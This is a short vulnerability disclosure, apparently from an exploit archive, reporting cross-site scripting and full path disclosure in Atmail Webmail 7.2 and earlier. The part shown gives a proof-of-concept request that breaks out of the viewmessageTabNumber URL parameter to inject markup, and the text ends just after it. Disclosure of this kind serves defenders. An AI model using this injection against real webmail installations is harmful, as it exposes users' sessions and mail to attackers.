#Title: Atmail Webmail =>7.2 - Multiple XSS & FPD #Date: 01.27.2014 #Vendor: atmail.com #Version: =>7.2 (Latest ATM), tested also on 7.1.1 #Authors: Smash_ & Brag / smash[at]devilteam.pl #PoC: poczta.pl / demo.atmail.com 1. Cross Site Scripting a) GET - viewmessageTabNumber Request: host/mail/index.php/mail/composemessage/index/viewmessageTabNumber/3">

XSS